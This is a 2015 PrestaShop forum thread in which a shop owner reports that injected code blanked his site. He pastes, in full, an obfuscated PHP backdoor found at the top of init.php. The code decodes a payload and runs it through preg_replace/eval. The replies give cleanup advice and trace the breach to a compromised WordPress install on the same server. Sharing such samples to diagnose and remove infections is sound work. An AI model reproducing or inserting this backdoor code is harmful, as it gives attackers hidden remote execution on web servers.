Jerz Posted September 15, 2015 Share Posted September 15, 2015 Yesterday the shop was functioning fully normally, but today in the morning both - front and back end - sites were just blank, white pages. I didn't do any updates to modules or prestashop. What I found out was strange code in most of php files on their beginning. Below example form init.php (main directory) <?php if(!isset($GLOBALS["\x61\156\x75\156\x61"])) { $ua=strtolower($_SERVER["\x48\124\x54\120\x5f\125\x53\105\x52\137\x41\107\x45\116\x54"]); if ((! strstr($ua,"\x6d\163\x69\145")) and (! strstr($ua,"\x72\166\x3a\61\x31"))) $GLOBALS["\x61\156\x75\156\x61"]=1; } ?><?php $wzvsmxqzyo = ']y3f]63]y3:]68]y76#<%x5c%x78e%x5c%x78b%x5c%x78%x5c%x7824-%x5c%x7824<%x5c%x7825j,,*x5c%x7878pmpusut!-#j0#!%x55c%x7825fdy>#]D4]273]D%x5c%x7825)!gj!<**2-4-bubE{h%x5c%x7825)sutcvt)esp>hmg%x5c%x7825!<25)tpqsut>j%x5c%x7825!*9!%x5c%K3#<%x5c%x7825yy>#]D6]281L1#%x5c:!>!#]y3d]51]y35]256]y76]72]y3d]51]y35]274]y4:]82]y3:]62]y4c#<!%x5c5c%x7824-%x5c%x7824*<!%x5%x5c%x787fw6*%x5c%x787f_*#[k2%x5c%x7860{6:!}7;!}6;##}C;!>>!}W;utpi}Y78257UFH#%x5c%x7827rfs%x5c%x78256~6<%x5c%x787fw6<*K)ftpmdXA6|7Oh%x5c%x782f#00#W~!%x5c%x7825t2w)##Qtjw)#]82#-#!#-%x5c%x7%x7825:-t%x5c%x7825)3of:opjudovg<~%x5c%x7824x5c%x7825z<jg!)%x5c%x7825z>>2*!%x5c%x7825z>3<!fmtf!%x5%x785c%x5c%x7825j:^<!%x5c%x7825w%x5c%x7860%x5c%x785c^>Ew:Qb:Qc:W~!62]y3:]84#-!OVMM*<%x22%51%x29%51%x29%73",825c!>!%x5c%x7825i%x5c%x785c2^<!Ce*[!%x5c%x7825cIjQeTf#<%x5c%x7825tdz>#L4]275L3]248L3P6L1M5]D2P47825ggg!>!#]y81]273]y76]258]y6g]273]y7OBSUOSVUFS,6<*msv%x5c%x78257-MSV,6<*)ujojR%x5c%x7%x5c%x7824-%x5c%x7824tvctus)%x5c%x7825%x5c%x7824-%x5c%x7824b!>825}X;!sp!*#opo#>>}R;msv}.;%x5c%x782f#%x5c%x782f#%x5*!|!%x5c%x7824-%x5c%x7824%x5c%x785c%x5c%x7825j^x5c%x7825r%x5c%x7878Bsfuvso!sboepn)%x5c%x7825epnbss-%x5c%x782c%163%x74%162%x5f%163%x70%154%x69%164%K)ebfsX%x5c%x7827u%x5c%x7825)7fmji%x5c%x78786<C%x5c%x7827&6<*rfs%x5x5c%x785cq%x5c%x7825%x5c%x7827Y%x%x7825%x5c%x7827jsv%x5c%x78256<C>^0fmjg}[;ldpt%x5c%x7825}
%x782f#o]#%x5c%x782f*)323zbe!-#jt0*?hnpd!opjudovg!|!**#j{hnpd#)tutjyf%x]275]y83]273]y76]277#<%x5c%x7825t2w>#]y74]273]y76]252]y85c%x785csboe))1%x5c%x782f35.)1%x5c%x764y]552]e7y]#>n%x5c%x7825<#372]58y%x5c%x7825z!>2<!gps)%x5c%x7825j>1<%x5c%x7825j=6[%x56R85,67R37,18R#>q%x5c%x7825V<*#fopoV;hojepdo5c%x7860opjudovg%x5c%x7822)!gj}1~!<2p%x5c%x7825%x5c%x787f!~!<##!>!|%x5c%x7824-%x5c%x7824gvodujpo!%x5c%x7824-%x5c%x7824y7%xpjudovg+)!gj+{e%x5c%x7825!osvufs!*!+A!>!{e%x5c%x7825)!>>%x5c%x7822!f%x7878B%x5c%x7825h>#]y31]278]y3e]81]K78:56985:6197g:74985-rr.93e:55;tuofuopd%x5c%x7860ufh%x5c%x786%x5c%x7827;!>>>!}_;gvc%x5c%x7825}&;ftmbg}%x50%x2e%52%x29%57%x65","%x65%166%x61%154%x28%151%x6d%160%x6c%157%x64%145x7825!|Z~!<##!>!2p%x5c%x7825!|!*!***b%x5c%x7825)sf%c%x7824-%x5c%x7824gps)%x5c%x7825j>1<%x5c%x7825j=tj{fpg)%x5c%x78:*<%x5c%x7825j:,,Bjg!)%x5c%x7825j:>>1*!%x7825r%x5c%x7878<~!!%x5c%x7825s:N}#-%x5c%x7825o:x7827!hmg%x5c%x7825)!g%x7825>2q%x5c%x7825<#g7825bG9}:}.}-}!#*<%x5c%x7825nfd>%x5c%x7825fdy<Cb*[%x5c%x7825h!>!%xreturn chr(ord($n)-1);} @error_reporting(0); 
preg_replace("%x2f%5_GMFT%x5c%x7860QIQ&f_UTPIif((function_exists("%x6f%142%x5f%163%x74%10;quui#>.%x5c%x7825!<***f%x5c%x7827,*e%x5c%x7827,*d%x5c%x7827,*c%x5c%xx5c%x7825w6<%x5c%x787fw6*CWtfs%x5c%x825)ufttj%x5c%x7822)gj6<^#Y#%!2p%x5c%x7825Z<^2%x5c%x785c2b%x5c%x7825!>!2p%x5c%x7825!*3>?*2b#[#-#Y#-#D#-#W#-#C#-#O#-#Nf]51L3]84]y31M6]y3e]81#%x5c%x78223}!+!<+{e%x5c%x7825+*!*+fepdfe{h+{d%x5c%x7825)+o825tmw)%x5c%x7825tww**WYsboepn)%x5c%x7825bss-%x5c%x7825r%x5c**197-2qj%x5c%x78257-K)udfoopdXA%x5c%x782x5c%x7825)utjm6<%x5c%x7875c%x7825b:>1<!fmtf!%x5c%x7825b:>#*%x5c%x7824%x5c%x782f%x5c%x7825kj:-!OVMM*<(<%x5c%x78e%x5c%x78b%x5c%x!%x5c%x7825yy)#}#-#%x5c%x7824-%x5c%x7824-tusqpt)%x5c%x7825z-#:#*%x57827,*b%x5c%x7827)fepdof.)fepdof.%x5c%x7c%x7860msvd},;uqpuft%x5c%x7860msvd}+;!>!}ufhA%x5c%x78272qj%x5c%x78256<^#zsfvr#c%x78257-C)fepmqnjA%x5c%x7827&6<.fmjgA%x5c%x7827doj%x5c%x786P2L5P6]y6gP7L6M7]D4]275]D:M8]D25%x5c%x7824-%x5c%x7824*<!~!dsx5c%x7827{**u%x5c%x7825-#jt0}Z;0]=]0#)2q%x5c%x75c%x7825_t%x5c%x7825:osvufs:~:<*9-1-r%x5c%*#57]38y]47]67y]37]88y]27]28y]#%x5c%x782fr%x5c%x7825%x5c%Rk3%x5c%x7860{666~6<&w6<%x5c%x787fw6*CW&)7gj6<.[A%x5c%x7827&6<7R37,#%x5c%x782fq%x5c%x7825>U<#16,47R57,27R66,#%x5c%x782fq%x5c%x5c%x785cq%x5c%x78257%x5c%x782f7#@#7%x5c%x782f7^#iubq#%x5c%x785cq%x5c7825)7gj6<*id%x5c%x7825)ftpmdR6<*id%x5c%x7825)dfyfR%x5c%x7827tfspde>u%x5c%x7825V<#65,47R25,d7R17,6%x782f#0#%x5c%x782f*#npd%x5c%x782f#)rrd%x5c%x782f#0<!%x5c%x7825o:!>!%x5c%x78242178}527}88:}334}472%x5c%x78tmbg)!gj<*#k#)usbut%xx5c%x78273qj%x5c%x78256<*Y%x5c%x7825)fnbozcY]y83]248]y83]256]y81]265]y72]254]y76#<%x5c%x7825tmw!>!#]y84udovg}k~~9{d%x5c%x7825:osvufs:~928>>%x5c%x7822:ftmbg39*56A:>:8:|:7#x7825!<*::::::-111112)eobs%x5c%x7860un>qp%x5c%5iN}#-!tussfw)%x5c%x7825c*W%x5c%x7825eN+#Qi%x5c%x785c1^W%x5c%x7pph#)zbssb!-#}#)fepmqnj!%x5c%x785c1^-%x5c%x7825r%x5c%x785c2^-%x5c%x7825hK9]78]K5]53]Kc#<%x5c%x7825tpz!>!#]D6M7]825w6Z6<.5%x5c%x7860hA%x5c3]y76]271]y7d]252]y74]256#<!%x5c%x7825ff2!>!bssbz)%x5;opjudovg}%x5c%x7878;0]=])0#)U!%0LDPT7-UFO
J%x5c%x7860GB)fubfsdXA%x5c%x7827K6<%x5c%x787fw6*3qj%x5c%x78824<!%x5c%x7825tzw>!#]y76]277]y72]265]y39fbuf%x5c%x7860gvodujpo)##-!#~<#%x5c%x782f%x5c%WCw*[!%x5c%x7825rN}#QwTW%x5c%x7825hIr%x5c%x7x7825%x5c%x7824-%x5c%x7824!>udovg}{;#)tutjyf%x5c%x7860opjudovg)!gj!|!*msv%x5c%x782%x5c%x7825h>EzH,2W%x5c%x7825wN;#-Ez-1H*97f-s.973:8297f:5297e:56-%x5c%x7878r.985:5%x5c%x7878:!>#]y3g]61%x7825)3of)fepdof%x5c%x786057ftbc%x5c%x787f!|!*uyfu%x5c%x7827k:) { $GLOBALS["%x61%156%x75%156%x61"]=1; function fjfgg($n){76]61]y33]68]y34]68]y33]65]y31]53]y6d]281]y43]78]82f14+9**-)1%x5c%x782f2986+7**^%x5c%x782f%x5c%x445]212]445]43]321]464]%x5c%x7825s:%x5c%x785c%x5c%x785)}k~~~<ftmbg!osvufs!|ftmf!~<**9.-j%x5c%x7825-bf#7e:55946-tr.984:75983:48984:71]K9]77]D4]82]K6]72]5c%x7825tdz)%x5c%x7825bbT-%x5c%x7825bT-%x5c%x7825hW~*#cd2bge56+99386c6f+9f5d816:+946:ce44#)zbssb!>!ssbnpe284]364]6]234]342]58]24]31#-%x5c%x7825tdz*Wsfuvso!%x5c%x7825bss%x5%x5c%x78256<*17-SFEBF71]y7d]252]y74]256]y39]252]y83]273]y72]282#<!%x5c%x7825tjw!>!#]y84]275x782fh%x5c%x7825)n%x5c%x7825-#+I#)q%x5c%x82f#@#%x5c%x782fqp%x5c%x7825>5h%x5c%827pd%x5c%x78256<pd%x5c%x7825w6Z6<.3%x5c%x7860hA%x5c%x7827pd%x5c%x78256<pd%x7825=*h%x5c%x7825)m%x5c%x7825):fmji%x5c%x7878:<##:>:h%x5c%x7825:<#QcOc%x5c%x782f#00#W~!Ydrr)%!ftmf!}Z;^nbsbq%x5c%x7825%x5c%x785cSFWSFT%x5c%x7860%x5c%x77f_*#fubfsdXk5%x5c%x7860{66~6<&w6<%x5c%x787fw6*CW&)7gj6<*doj%x5c%x7825z>2<!%x5c%x7825ww2)%x5c%x7825w%x5c%x7860TW~%x5cx7827{ftmfV%x5c%x787f0%x28%42%x66%152%x66%147%x67%42%xx5c%x7824y4%x5c%x7824-%x5c%x7824]y8%x5c%x7824-%x5c%x7824]26)}.;%x5c%x7860UQPMSVD!-id%x5c%x7825)uqpuft%x552985-t.98]K4]65]D8]86]y31]278]y3 NULL); 
}]y74]275]y7:]268]y7f#<!%x5c%x7825tww!>!%x5c%x782400~:<h%x822)gj!|!*nbsbq%x5c%x7825)323ldfidk!~!<**qp%x5c%x7825!-uyfu%x5cx5c%x7860SFTV%x5c%x7860QUUI&b%x5c%x7825!|!*)323%x7825t::!>!%x5c%x7824Ypp3)%x5c%x7825cB%x5c%x782K;%x5c%x7860ufldpt}X;%x5c%x7860msvd}R;*msv%x5c%x7825]274]y85]273]y6g]273]y76]2#-#E#-#G#-#H#-#I#-#K#-#L#-#M#-Rd%x5c%x7825)Rb%x5c%x7825))!gj!<de:4:|:**#ppde#)tutjyf%x5c%x78604%x5c%x782x5c%x787f!<X>b%x5c%x7825Z<#opo#>b%c%x7825ww2!>#p#%x5c%x782f#p#%x5c%x782f%zsfvr#%x5c%x785cq%x5c%x7x7825)s%x5c%x7825>%x5c%x782fh%x5c%x7825:<*},;osvufs}%x5c%x7827;mnui}&;zepc}A;~!}x5c%x7825!*##>>X)!gjZ<#opo#>b%x5c%x7825!**X)ufttj%x5c%x7dov{h19275j{hnpd19275fubmgoj{h1:|:*mmvo:>:iuhofm%x5c%x7825:-5ppW%x5c%x7825c:>1<%x5c%x7825b:>1<!gps)%x5c%x7825j:>1<%x5c3]Kc]55Ld]55#*<%x5c%x82f!#0#)idubn%x5c%x7860hfsq)!sp!*#ojneb#-*f%x5c%x7825)sI,6<*127-UVPFNJU,6<*27-SFGT%x5c%x7825fdy)##-!#~<%x5c%x7825h00#*<%x5c41%x72%164") && (!isset($GLOBALS["%x61%156%x75%156%x61"])))sfqmbdf)%x5c%x7825%x5c%x7824-%256<%x5c%x787fw6*%x5c%x787f_*#fmjgk4%x5c%x7860{6~6<tfs%%x7824<%x5c%x78e%x5c%x78b%x5c%x7825mm)%x5c%x7825%x5c%x7878:-!%x5c%x25j:.2^,%x5c%x7825b:<!%x5c%x7825c:>%x5c%x7825s:%x5c#zsfvr#%x5c%x785cq%x5c%x78257**^#fw6*CW&)7gj6<*K)ftpmdXA6~6<u%x5c%x78257>%x5c%x782f7&6|7**111127-j!~<ofmy%x5c%x7825,3,j%x5c%x7825>j%x5c%x7825!<**3-j%x5c%x7825-bubE{h%y33]65]y31]55]y85]82]y76]jyf%x5c%x7860%x5c%x7878%x5c%x7822l:!}V;3q%x5c%x7825}U;y]}R;2]x5c%x7825w6Z6<.2%x5c%x7860hA%x5c%x7827pt)fubmgoj{hA!osvufs!~<3,25r%x5c%x7878W~!Ypp2)%x5c%x7825c%x787f;!osvufs}w;*%x5c%x787f!>>%x5c%x7822!pd%x5c%x7825)!gj}Z;h!opjF.uofuopD#)sfebfI{*w%x5c%x7825)kV%x5c%x7878{**#k#)tut257>%x5c%x782272qj%x5c%x7825)7gj6<**2qj%x5c%x7825)hopm3qjA)qj3hopmA%]472]37y]672]48y]#>s%x5c%x7825<#462]47y]252]18y]#>q%x5c%x7825!-#1]#-bubE{h%x5c%x7825)tpqsut>j%x5c%x7825!*72!%x5c%x7f%x5c%x7878pmpusut)tpqssutRe%x5c%x7825)%x7825nfd)##Qtpz)#]341]88M4P8]37]278]225]241]334]368]322]3]364]6%x5c%x7825-#1GO%x5c%x7822#)fepmqyfA>26]271]y7d]252]y74]256#<!%x5c%x7825ggg)(0)%x5c%x782f+*0f(
-!#]y5c%x78256<.msv%x5c%x7860ftsbqA7>q%x5c%x78256<%x5c%x787fw6*%x5c%x7878X6<#o]o]Y%x5c%x78257;utpI#7>%x5c%827id%x5c%x78256<%x5c%x787fw6*%x5c%x787f_*#ujojx782f7rfs%x5c%x78256<#o]1%x5c%x782f20QUUI7jsv%x5c%x1y]c9y]g2y]#>>*4-1-bubE{h%x5c%x7825)sutcvt)!gj!|!*bubE{h%x5c%x7825)j{5-*.%x5c%x7825)euhA)3of>2bd%x5c%x7825!<5h%x5c%x7825%x5c6#)tutjyf%x5c%x7860439275ttfsqnp*5!%x5c%x7827!hmg%x5c%x7825)!gj!|!*1?hmg]+^?]_%x5c%x785c}X%x5c%x7*&7-#o]s]o]s]#)fepmqyf%x5c%x7827*&7-n%b%x5c%x7825!<*qp%x5c%x78250%x22%134%x78%62%x35%165%x3a%146%x21%76%x21%50%x5c%x782c%x7825<#762]67y]562]38y]572]48y]#>m%x5c%x7825:|:*r%x5c%x7827pd%x5c%x78256<pd%x5c%x7825w6Z6<.4%x5c%x7860hA%x5c%x72)7gj6<*QDU%x5c%x7860MPT7-NBFSUT%x5c%x78612>j%x5c%x7825!|!*#9j%x5c%x7825>j%x5c%x7825!*3!%x5c%]256]y6g]257]y86]267]D6#<%x5c%x7825G]y6d]281Ld]245]K2]285]Ke]53Ld]524<!%x5c%x7825mm!>!#]y81]273]y76]258]y6g]27825l}S;2-u%x5c%x7825!-#2#%x5c%x<*X&Z&S{ftmfV%x5c%x787f<*XAZASV<*w%x5c%x7825)p%x5c%x7860QUUI&e_SEEB%x5c%x7860FUPNFS&d_SFSFGFS%x5c%x7860QUUI&c_UOFHB%7825tzw%x5c%x782f%x5c%x7824)#P#-#Q#-#B#-#T782f#%x5c%x7825#%x5cc%x78257-K)fujs%x5c%x78%x782f#M5]DgP5]D6#<%x38M7]381]211M5]67]452]88]5]48]32M3]317]c%x782f},;#-#}+;%x5c%x7825-qp%x5c%x7825)54l}%x5c%x7827827!hmg%x5c%x7825)!gj!<2,*j%x5c%x7825-#1]#-bubE{h%x5c%x78ubE{h%x5c%x7825)sutcvd%x5c%x78256<C%x5c%x7827pd%x5c%x78256|6.7eu{66~67<&w6<c%x7824]25%x5c%x7824-%x5c%x7824-!%x5c%x7825%x5c%x7824-%x5c%x7824zB%x5c%x7825z>!tussfw)%x5c%x7825zW5c%x7860cpV%x5c%x787f%x5c%x787f%x5c%x787f%x5c%x787f<u%x5c%x7825V%x5c%%x28%141%x72%162%x61%171%x5f%155%x61%16c%x7824-%x5c%x7824!>!tus%x5c%x7860;%x5c%x7825!<*#}_;#)323ldfid>}&;!osvufs}%x5c%x787f;!opj%x7825j:=tj{fpg)%x5c%x7825s7825:>:r%x5c%x7825:|:**t%x5c%x7825)m%x5c%x5c%x7825)sutcvt-#w#)ldbqov>*ofmy%x5c%x7825)utjm!|!%x5c%x7825)gpf{jt)!gj!<*2bd]283]427]36]373P6]36]73]83]276]277]y72]265]y39]271]y83]256]y78]248]y83]256]y81]265]y72]254]y!fyqmpef)#%x5c%x7824*<!%x5c%x7825kjzbek!~!<b%x5c%x7825%c%x782f!**#sfmcnbs+yfeobz+sfwjids%x5c%x787f;!|!}{;)gj}l;33bq}k25w:!>!%x5c%
x78246767~6<Cw6<pd%x5c%x7b%x5c%x7860bj+upcotn+qsvmt+fmhx7827!hmg%x5c%x7825!)!gj!<2,*j%x5/(.*)/epreg_replacehqhzfwgaft'; $fjijxrgwdr = explode(chr((226-182)),'2438,43,6911,59,4830,59,2348,65,1966,70,9523,39,5840,33,1145,39,8506,56,4745,22,0,46,10006,37,4272,26,8617,58,5475,48,5523,27,7425,39,9302,54,8443,38,2886,25,7206,64,1184,67,9087,23,8089,35,8171,51,417,62,2845,41,8675,41,4383,69,7639,68,3882,44,3160,37,3587,70,1284,34,7173,33,6489,24,2587,29,1251,33,8023,66,5702,63,3197,59,7000,55,2551,36,3657,64,5307,21,6843,27,875,49,8124,47,3463,62,349,68,1891,31,1318,23,6234,52,5932,45,3119,41,1922,44,7519,67,4611,54,5038,47,9281,21,7464,24,8736,32,10073,33,7761,61,9224,57,195,30,2238,22,7270,69,9719,51,8378,40,130,65,8716,20,8222,69,1377,35,1634,65,2616,62,9770,27,7925,37,8481,25,8291,55,3755,51,2481,70,3079,40,5439,36,4052,46,2036,51,82,26,9944,33,10043,30,4161,31,6788,55,7822,39,6342,32,5188,53,2413,25,8955,70,6139,47,9924,20,6416,34,6593,56,6076,63,4767,63,5644,58,986,52,9170,54,9596,55,3985,67,8346,32,6649,63,6374,42,2736,49,1756,68,3861,21,9454,69,5819,21,8909,46,3721,34,3525,62,2260,22,1590,44,7586,53,7364,61,6555,38,9977,29,4351,32,3317,47,8878,31,9067,20,1341,36,8418,25,4452,41,6286,26,5328,70,3926,59,1412,57,8768,20,6019,57,3364,42,6513,42,3406,57,5398,41,9678,41,5550,67,1505,34,7707,54,8562,55,536,44,3806,55,8835,43,4298,53,9356,64,1038,47,924,62,3012,67,9562,34,6970,30,5873,59,46,36,1699,57,324,25,2087,63,3287,30,4493,46,4583,28,9889,35,257,67,6186,48,4098,63,741,53,5617,27,1085,60,7488,31,9420,34,4665,39,4539,44,4192,41,479,57,2785,60,1824,67,4704,41,5977,33,2704,32,5085,51,4233,39,225,32,9110,21,108,22,3256,31,794,43,8788,47,6767,21,2282,66,5136,52,6870,41,7861,64,9797,28,9131,39,4985,23,5241,66,1469,36,4938,47,2191,47,6712,55,9651,27,2150,41,2911,32,5008,30,7122,51,634,66,1539,51,6450,39,580,54,5765,54,7055,67,9025,42,6312,30,2678,26,2943,69,837,38,7962,61,9825,64,4889,49,7339,25,700,41,6010,9'); $unshnoyqxo=substr($wzvsmxqzyo,(40686-30580),(46-39)); if 
(!function_exists('vptixarjmb')) { function vptixarjmb($qqyfwrgwbs, $uhustkeona) { $xpopuareeu = NULL; for($tnaspehgts=0;$tnaspehgts<(sizeof($qqyfwrgwbs)/2);$tnaspehgts++) { $xpopuareeu .= substr($uhustkeona, $qqyfwrgwbs[($tnaspehgts*2)],$qqyfwrgwbs[($tnaspehgts*2)+1]); } return $xpopuareeu; };} $jkgrqpeeoi="\x20\57\x2a\40\x66\150\x6a\142\x65\143\x72\154\x76\156\x20\52\x2f\40\x65\166\x61\154\x28\163\x74\162\x5f\162\x65\160\x6c\141\x63\145\x28\143\x68\162\x28\50\x32\62\x39\55\x31\71\x32\51\x29\54\x20\143\x68\162\x28\50\x34\63\x33\55\x33\64\x31\51\x29\54\x20\166\x70\164\x69\170\x61\162\x6a\155\x62\50\x24\146\x6a\151\x6a\170\x72\147\x77\144\x72\54\x24\167\x7a\166\x73\155\x78\161\x7a\171\x6f\51\x29\51\x3b\40\x2f\52\x20\153\x7a\146\x63\147\x66\143\x6d\171\x65\40\x2a\57\x20"; $cfrfbrhwlx=substr($wzvsmxqzyo,(60237-50124),(73-61)); $cfrfbrhwlx($unshnoyqxo, $jkgrqpeeoi, NULL); $cfrfbrhwlx=$jkgrqpeeoi; $cfrfbrhwlx=(818-697); $wzvsmxqzyo=$cfrfbrhwlx-1; ?> I have no idea how it came there, just made a recovery from last backup (made one day earlier - lucky me) and everything seems to be fine. Any clues what to do to not let that happen again? Link to comment Share on other sites More sharing options...
El Patron Posted September 15, 2015

I did find something on this via search: http://security.stackexchange.com/questions/70579/is-this-a-backdoor
Jerz (Author) Posted September 15, 2015

> I did see something via search on this http://security.stackexchange.com/questions/70579/is-this-a-backdoor

Thanks, it seems to be the same issue - and now the code is back there again. The question is what to do next. I'm now changing all passwords and the shop is in maintenance mode, but I'm afraid that won't be enough.
El Patron Posted September 15, 2015

I suspect that the backup itself has been infected, so when you restore it, the infection propagates again.

Change all FTP passwords.

Ensure file permissions are sound, typically 755 for folders and 644 for files.

You can also try this trick: make sure you have an up-to-date anti-virus such as Bitdefender, download your remote files to your computer and run the anti-virus on them. If any files are detected, download the native PrestaShop release for the version you are using and replace each infected file with the native one.

Another little tip: using FTP, look for files whose date/time stamp differs from the others.

Sorry you have this issue, it's very frustrating.
Jerz (Author) Posted September 15, 2015

Thank you very much again! I checked everything as you wrote and I think I found the source of the problem. There was also a WordPress installation on the same server and it had been hacked - some users other than the admin had been added. So WordPress has been uninstalled and PrestaShop restored again from backup. It seems to be clean now, but I will monitor it over the next few days to see whether the problem comes back.
El Patron Posted September 15, 2015

Yes, I assumed that WordPress was installed but didn't want to say anything.

Something like this happened to me a few years ago. I felt a bit violated, so I wrote this for my own use: https://www.prestashop.com/forums/topic/303132-module-prestavault-malware-trojan-virus-protection/

I'm happy you have made progress.